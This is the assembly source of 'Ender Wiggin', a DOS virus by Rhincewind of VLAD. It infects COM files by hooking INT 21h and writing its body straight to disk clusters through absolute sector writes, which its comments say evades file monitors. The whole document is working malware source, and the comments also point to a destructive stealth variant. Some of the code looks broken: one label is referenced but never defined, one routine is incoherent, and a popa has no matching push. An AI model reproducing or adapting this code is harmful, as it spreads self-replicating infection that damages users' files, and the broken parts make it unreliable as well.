; Ender Wiggin, a cluster-thingy by Rhincewind [Vlad]
; This virus infects COM files using sector reads and writes, but not using
; it's own file engine. Target files are opened using DOS. After that
; the SFT's are queried which contain all the cluster numbers relevant
; to infecting the file, being the first and last cluster. To get the last
; cluster number you must read from that cluster which will enter the number
; into the SFT's current cluster field. Infection is very straightforward
; otherwise. This hybrid file/sector-level infection evades most of the
; active file monitors, and thus a destructive stealth virus of this type
; is a possible threat especially since directory stealthing can now be
; done without risk or additional checks. Luckily, the larger the virus
; gets, the fewer files it will be able to infect.
; Setting the file's date/time to what it was in the first place forces a
; directory entry rewrite which is vital to the infection.
.model tiny
org 100h
parasize equ (endmem-start)
start: push 100h
mov ax, 3521h
int 21h
call next
next: pop bp
cmp ax, 2135h
jz exit_loader
mov [bp+(int21offset-next)],bx
mov [bp+(int21seg-next)],es
mov ah, 30h
int 21h
cmp al,4
jb exit_loader
push cs
pop es
mov ah, 4ah
mov bx,-1
push ax
int 21h
pop ax
sub bx, parasize+2
int 21h
xor di,di
nextpsp: cmp bx, word ptr ds:[di+16h]
mov bx, word ptr ds:[di+16h]
mov ds,bx
jnz nextpsp
found_cmd: mov ah, 50h
int 21h
mov ah, 48h
mov bx,parasize+1
int 21h
sub ax,10h
mov es,ax
mov ah, 50h
mov bx,cs
int 21h
push cs
pop ds
lea si, [bp-(next-start)]
mov di,100h
mov cx, endcopy-start
rep movsb
push es
pop ds
mov ax, 2521h
mov dx, offset int21
int 21h
exit_loader: push cs
push cs
pop es
pop ds
lea si, [bp+(three_bytes-next)]
mov di, 100h
xor ax,ax
xor bx,bx
mov cx,00ffh
mov bp,ds
xor si,si
mov di,sp
int21: cmp ax, 3521h
jnz no_residency_check
call dword ptr cs:int21offset
xchg ah,al
cmp ax, 4b00h
jz infect_me_baby
db 0eah
int21offset dw ?
int21seg dw ?
db '-Ender Wiggin, by Rhince/VLAD-'
infect_me_baby: push ds
push es
mov ax, 3d00h
int 21h
jnc open_ok
jmp jmp_int21
open_ok: push ax
xchg ax,bx
mov ax, 440ah
int 21h
test dh,10000000b
jz local_handle
jmp close_exit
local_handle: push cs
pop es
mov ah,60h
mov si,dx
mov di, offset endcopy
int 21h
push word ptr es:[di]
push cs
pop ds
mov ax, 4202h
mov cx,-1
mov dx,cx
int 21h
mov ah,3fh
neg cx
mov dx, offset clust_read
int 21h
mov ax, 1220h
int 2fh
mov ax, 1216h
mov bl, byte ptr es:[di]
int 2fh
mov fill_cs,cs
pop dx
sub dl,'A'-1
mov ah, 32h
int 21h
mov ax, word ptr ds:[bx+0bh]
mov cs:data_sec,ax
mov cl, byte ptr ds:[bx+4]
inc cl
mov cs:sec_clust,cl
dec dl
mov bp,dx
mov ax, word ptr ds:[bx+02]
xor ch,ch
mul cx
cmp ax, 512*8
ja go_close_exit
cmp word ptr es:[di+13h],dx
jnz go_close_exit
xchg ax,bx
mov ax, word ptr es:[di+11h]
div bx
push dx
neg dx
add dx,bx
cmp dx, (endcopy-start)
jb go_close_exit
push cs
pop ds
mov ax, word ptr es:[di+0bh]
call calc_sec
int 25h
pop dx
mov ax, word ptr ds:[bx+(clust_read-secdata)]
cmp ax, 'ZM'
jz go_close_exit
cmp ax, 'MZ'
jnz no_close_exit
go_close_exit: jmp close_exit
no_close_exit: mov word ptr ds:[bx+(three_bytes-secdata)],ax
mov ax, word ptr ds:[bx+(clust_read-secdata)+1]
mov byte ptr ds:[bx+(three_bytes-secdata)+2],ah
add ax, (endcopy-start)
mov cx, word ptr es:[di+11h]
sub cx,3
cmp ax,cx
jz go_close_exit
mov byte ptr ds:[bx+(clust_read-secdata)],0e9h
mov word ptr ds:[bx+(clust_read-secdata)+1],cx
push dx
call movez
int 26h
mov ax, word ptr es:[di+35h]
call calc_sec
int 25h
mov dx,bx
pop bx
add bx, offset clust_read
mov si, 100h
mov cx, (endcopy-start)
copyloop: lodsb
mov byte ptr ds:[bx],al
inc bx
loop copyloop
mov bx,dx
call movez
int 26h
add word ptr es:[di+11h],(endcopy-start)
adc word ptr es:[di+13h],0
close_exit: pop bx
mov ax, 5700h
int 21h
mov ax, 5701h
int 21h
mov ah, 3eh
int 21h
jmp_int21: popa
pop es
pop ds
jmp dword ptr cs:int21offset
calc_sec: mov bx, offset secdata
dec ax
dec ax
mul word ptr ds:[sec_clust]
add ax, data_sec
adc dx, 0
mov word ptr ds:[bx],ax
mov word ptr ds:[bx+2],dx
movez: mov bx, offset secdata
xor cx,cx
dec cx
mov ax,bp
three_bytes db 90h, 0cdh, 20h
secdata dd 0
sec_clust db 1
db 0
offzet dw offset clust_read
fill_cs dw ? ;Doh I want relocation items.
data_sec dw ?
clust_read: db 512*8 dup (?)
end start